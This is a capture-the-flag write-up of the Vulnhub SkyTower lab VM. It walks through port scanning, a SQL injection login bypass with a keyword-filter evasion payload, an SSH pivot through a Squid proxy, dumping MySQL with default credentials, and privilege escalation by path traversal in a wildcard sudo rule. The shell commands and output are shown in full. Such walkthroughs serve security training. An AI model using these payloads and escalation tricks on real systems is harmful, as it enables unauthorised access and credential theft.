Vulnhub - SkyTower Writeup
Description
Vulnhub - SkyTower. Welcome to SkyTower:1 This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the “flag”.
You will require skills across different facets of system and application vulnerabilities, as well as an understanding of various services and how to attack them. Most of all, your logical thinking and methodical approach to penetration testing will come into play to allow you to successfully attack this system. Try different variations and approaches. You will most likely find that automated tools will not assist you.
We encourage you to try it our for yourself first, give yourself plenty of time and then only revert to the Walkthroughs below.
Enjoy!
Telspace Systems
@telspacesystems
Enumeration
Start by enumerating the open ports.
Nmap
Nmap scan report for skytower.com (192.168.100.3)
Host is up, received arp-response (0.00074s latency).
Scanned at 2020-05-01 10:17:16 EDT for 33s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
22/tcp filtered ssh no-response
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy syn-ack ttl 64 Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
On opening port 80 in a web browser, we are presented with a login screen.
Some initial tests shows that the website is vulnerable to sql injection
Let’s do some additional tests using burpsuite and see if we can bypass the login using ' OR 1=1 #.
We can see that the application is blocking some keywords like OR, AND and =.
On further inspection, we can see that the application filters out the keywords just once. We can bypass the filtering for OR by using OORR. This way, when the system filters out the OR in the middle , we still get the OR keyword. 1=1 can be substituted by 1<2. Our payload for login bypass will be ' OORR 1<2 #
And we have successfully bypassed the login page and we are presented with some ssh credentials. However there is no ssh port open on the system.
Low Shell
Proxychains
There is a squid server running on port 3128. We can try redirecting our traffic using this to proxy to login to ssh.
Add the squid proxy in the conf file.
kali@kali:~$ tail /etc/proxychains.conf
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 192.168.100.4 3128
Connect to ssh via proxy.
kali@kali:~$ proxychains ssh john@192.168.100.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.4:3128-<><>-192.168.100.4:22-<><>-OK
john@192.168.100.4's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 6 23:15:58 2020 from 192.168.100.3
Funds have been withdrawn
Connection to 192.168.100.4 closed.
We successfully connected to ssh but we are immediately kicked of after printing the message Funds have been withdrawn.
This is probably because of an entry in .bashrc file. We can get a shell by appending /bin/bash at the end of the ssh command. This ensures that our command is executed before we are kicked out. Rename the .bashrc file after getting the shell and then login again.
kali@kali:~$ proxychains ssh john@192.168.100.3 /bin/bash
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.3:3128-<><>-192.168.100.3:22-<><>-OK
john@192.168.100.3 password:
ls
id
uid=1000(john) gid=1000(john) groups=1000(john)
ls -la
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile
mv ./.bashrc bashrc
Re-login as john
kali@kali:~$ proxychains ssh john@192.168.100.3
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.3:3128-<><>-192.168.100.3:22-<><>-OK
john@192.168.100.3's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 6 23:11:39 2020 from 192.168.100.3
john@SkyTower:~$ id
uid=1000(john) gid=1000(john) groups=1000(john)
john@SkyTower:~$
Privilege Escalation
Download the Linux Enumeration script to the system and run it to probe for system weaknesses.
MySql
The script found that MySql has default credentials root/root. Login to MySql and dump the database.
john@SkyTower:~$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 5.5.35-0+wheezy1 (Debian)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| SkyTech |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
mysql> use SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login |
+-------------------+
1 row in set (0.00 sec)
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)
We have some credentials here. Let’s see if we can ssh using these.
kali@kali:~$ proxychains ssh sara@192.168.100.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.4:3128-<><>-192.168.100.4:22-<><>-OK
sara@192.168.100.4's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 7 01:03:28 2020 from 192.168.100.4
Funds have been withdrawn
Connection to 192.168.100.4 closed.
We can, but we are kicked out after login. Do the same we did for john with the .bashrc file and re-login.
kali@kali:~$ proxychains ssh sara@192.168.100.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.4:3128-<><>-192.168.100.4:22-<><>-OK
sara@192.168.100.4's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 6 23:36:02 2020 from 192.168.100.3
sara@SkyTower:~$ id
uid=1001(sara) gid=1001(sara) groups=1001(sara)
sara@SkyTower:~$
Check if the user has any sudo permissions.
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$
We can run sudo /bin/cat /accounts/* and sudo /bin/ls /accounts/*. But how can we escalate privilege using these?. All we can do is view the files in /accounts/ folder. And there is nothing in that folder.
After racking my brain for some time, I found a rather simple solution. According to the sudo requirement, our command should start with sudo /bin/ls /accounts/*. What will happen if we try navigating to other folders using \..\.
sara@SkyTower:/accounts$ sudo /bin/ls /accounts/../
accounts bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz
sara@SkyTower:/accounts$ sudo /bin/ls /accounts/../root/
flag.txt
sara@SkyTower:/accounts$ sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
It WORKS! and the root password is in there.
Root Shell
Login using the credentials we got from the flag file.
kali@kali:~$ proxychains ssh root@192.168.100.3
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.3:3128-<><>-192.168.100.3:22-<><>-OK
root@192.168.100.3's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 09:01:28 2014
root@SkyTower:~# ud
-bash: ud: command not found
root@SkyTower:~# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:~# cat /root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
root@SkyTower:~#
And we are root.
